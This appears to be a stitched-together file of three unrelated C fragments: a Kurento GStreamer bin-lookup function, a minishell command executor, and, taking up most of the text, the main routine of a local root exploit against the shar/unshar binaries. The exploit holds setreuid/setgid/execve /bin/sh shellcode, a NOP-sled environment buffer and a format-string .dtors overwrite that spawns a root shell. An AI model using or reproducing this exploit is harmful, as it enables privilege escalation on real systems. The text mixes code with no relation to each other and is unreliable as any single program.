static GstBin *
kms_agnostic_bin2_find_bin_for_caps (KmsAgnosticBin2 * self, GstCaps * caps)
{
GList *bins, *l;
GstBin *bin = NULL;
if (gst_caps_is_any (caps) || gst_caps_is_empty (caps)) {
return self->priv->input_bin;
}
if (check_bin (KMS_TREE_BIN (self->priv->input_bin), caps)) {
bin = self->priv->input_bin;
}
bins = g_hash_table_get_values (self->priv->bins);
for (l = bins; l != NULL && bin == NULL; l = l->next) {
KmsTreeBin *tree_bin = KMS_TREE_BIN (l->data);
if (check_bin (tree_bin, caps)) {
bin = GST_BIN_CAST (tree_bin);
}
}
g_list_free (bins);
return bin;
}
void exec(t_cmd *cmd)
{
pid_t pid;
int stat;
stat = 0;
if (ft_strchr(cmd->tab[0], '/'))
cmd->bin = 1;
if (!sh_cmd(cmd))
return ;
else if (cmd->bin == 1 || check_bin(cmd))
{
gestion_signal(1);
if ((pid = fork()) < 0)
sh_error(1, cmd, -1);
else if (pid == 0)
if ((stat = execve(cmd->cmd, cmd->tab, cmd->env)) == -1)
sh_error(2, cmd, stat);
wait(&stat);
if (WIFEXITED(stat))
cmd->ret = WEXITSTATUS(stat);
else if (WIFSIGNALED(stat))
signal_message_exec(WTERMSIG(stat));
gestion_signal(0);
}
else
sh_error(0, cmd, 0);
}
int main(void) {
int16_t check_bin(void);
u_int32_t get_dtors(int8_t* path);
int16_t get_auto_stack_offset(int8_t *binpath);
void banner(void);
int8_t envbuf[1000];
int8_t store_env[1010];
int8_t *shar_path = SHAR_PATH;
int8_t *unshar_path = UNSHAR_PATH;
static u_int8_t shellcode[] = // setreuid(0,0)
"\x31\xc0" // xor %eax,%eax
"\x31\xdb" // xor %ebx,%ebx
"\x31\xc9" // xor %ecx,%ecx
"\xb0\x46" // mov $0x46,%al
"\xcd\x80" // int $0x80
// setgid(0)
"\x31\xdb" // xor %ebx,%ebx
"\x89\xd8" // mov %ebx,%eax
"\xb0\x2e" // mov $0x2e,%al
"\xcd\x80" // int $0x80
// execve /bin/sh
"\x31\xc0" // xor %eax,%eax
"\x50" // push %eax
"\x68\x2f\x2f\x73\x68" // push $0x68732f2f
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f
"\x89\xe3" // mov %esp,%ebx
"\x8d\x54\x24\x08" // lea 0x8(%esp,1),%edx
"\x50" // push %eax
"\x53" // push %ebx
"\x8d\x0c\x24" // lea (%esp,1),%ecx
"\xb0\x0b" // mov $0xb,%al
"\xcd\x80" // int $0x80
// exit();
"\x31\xc0" // xor %eax,%eax
"\xb0\x01" // mov $0x1,%al
"\xcd\x80"; // int $0x80
banner();
if(!check_bin())
exit(EXIT_FAILURE);
memset(envbuf,NOP,sizeof(envbuf));
strcpy((int8_t *)&envbuf[sizeof(envbuf) - strlen(shellcode)],shellcode);
memcpy(store_env,"CANDY=",6);
strcat(store_env,envbuf);
putenv(store_env);
if(!putenv) {
if(errno == ENOMEM) {
strerror(errno);
exit(EXIT_FAILURE);
}
}
const int8_t *USEBIN;
int16_t USE_OFFSET;
if(WBIN == 1){
printf("[+]Exploiting the unshar binary\n");
USEBIN = unshar_path;
}
if(WBIN == 2){
printf("[+]Default binary is shar\n");
USEBIN = shar_path;
}
if(WBIN == 3) {
printf("[+]Exploiting Shar binary\n");
USEBIN = shar_path;
}
int8_t store[200];
u_int32_t fakebuf = 0xbffffffa - strlen(store_env) - strlen("/usr/bin/shar") + 50;
u_int32_t write_dtors = get_dtors((int8_t *)USEBIN);
int8_t *dtors_target[3] =
{ (int8_t *) write_dtors + 2,
(int8_t *) write_dtors,
NULL
};
int16_t env_most,
env_low;
env_most = (fakebuf & 0xffff0000) >> 16 ;
env_low = (fakebuf & 0x0000ffff);
env_most -= 0x8;
USE_OFFSET = get_auto_stack_offset((int8_t *)USEBIN);
sprintf(store,"%s%%.%dx%%%d$hn%%.%dx%%%d$hn",
&dtors_target,
(u_int16_t)env_most,
USE_OFFSET,
(env_low - env_most) - 0x8,
USE_OFFSET + 1);
fprintf(stdout,"[+]Type some command,sh$ prompt may not occur\n");
fprintf(stdout,"[+]Terminal echoing is possibly off \n");
fprintf(stdout,"Type any shell command Here i.e 'id' or 'ps aux'\n");
execlp(USEBIN,USEBIN,store);
fflush(stdin);
fflush(stdout);
return EXIT_SUCCESS; // useless, never return
}
